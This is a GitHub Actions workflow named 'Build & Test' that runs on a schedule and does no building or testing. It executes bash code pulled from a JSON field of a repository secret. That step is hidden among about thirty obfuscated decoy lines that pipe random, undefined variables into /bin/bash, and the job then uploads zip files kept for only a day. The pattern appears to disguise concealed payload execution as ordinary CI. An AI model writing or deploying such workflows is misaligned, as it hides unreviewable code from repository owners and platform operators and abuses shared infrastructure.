name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '29 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          rd6: ${{ secrets.rd6 }}
        run: |
          printf '%s' "$rd6" | jq -r .bnoaa2207 | /bin/bash
          echo $ajy78209 | jq -r .pta134 | /bin/bash
          echo $ccxjq56767 | jq -r .xqc19 | /bin/bash
          printf '%s' "$nxprn90" | jq -r .mhh0 | /bin/bash
          printf '%s' "$nz3" | jq -r .qr8 | /bin/bash
          echo $eobb6 | jq -r .zrd382 | /bin/bash
          printf '%s' "$j12" | jq -r .ftzm351 | /bin/bash
          echo $ndww23995 | jq -r .jhvf406 | /bin/bash
          printf '%s' "$xumc8583" | jq -r .ce282 | /bin/bash
          echo $lyj74909 | jq -r .mjx29171 | /bin/bash
          printf '%s' "$efv0670" | jq -r .fzeoi0928 | /bin/bash
          echo $wcbis9 | jq -r .o34 | /bin/bash
          echo $t732 | jq -r .sho169 | /bin/bash
          echo $mkmwe143 | jq -r .gch9 | /bin/bash
          echo $kqyug0 | jq -r .dsuta10 | /bin/bash
          printf '%s' "$wmiqd41" | jq -r .klb85275 | /bin/bash
          printf '%s' "$oioih9" | jq -r .vgu64 | /bin/bash
          printf '%s' "$s3213" | jq -r .dahu92542 | /bin/bash
          printf '%s' "$lw9154" | jq -r .ezroj0 | /bin/bash
          echo $w497 | jq -r .c4 | /bin/bash
          printf '%s' "$vh9" | jq -r .yc8 | /bin/bash
          echo $vsnq4961 | jq -r .xln0 | /bin/bash
          echo $hnq168 | jq -r .rni781 | /bin/bash
          printf '%s' "$kxhy430" | jq -r .to1705 | /bin/bash
          echo $m8 | jq -r .gu27 | /bin/bash
          printf '%s' "$od08313" | jq -r .bezd89 | /bin/bash
          printf '%s' "$femxg219" | jq -r .jfmbi6 | /bin/bash
          printf '%s' "$gwgga6" | jq -r .xdddo876 | /bin/bash
          printf '%s' "$uwfsk98" | jq -r .lm34 | /bin/bash
          printf '%s' "$vrkz05" | jq -r .zsiw37891 | /bin/bash
          printf '%s' "$iex451" | jq -r .b8044 | /bin/bash
          printf '%s' "$xtf935" | jq -r .ncx86 | /bin/bash
          echo $tag4 | jq -r .ilwwu06703 | /bin/bash
          echo $zrgi52066 | jq -r .nh41817 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: Yvs5NVBa
          path: "*.zip"
          retention-days: 1
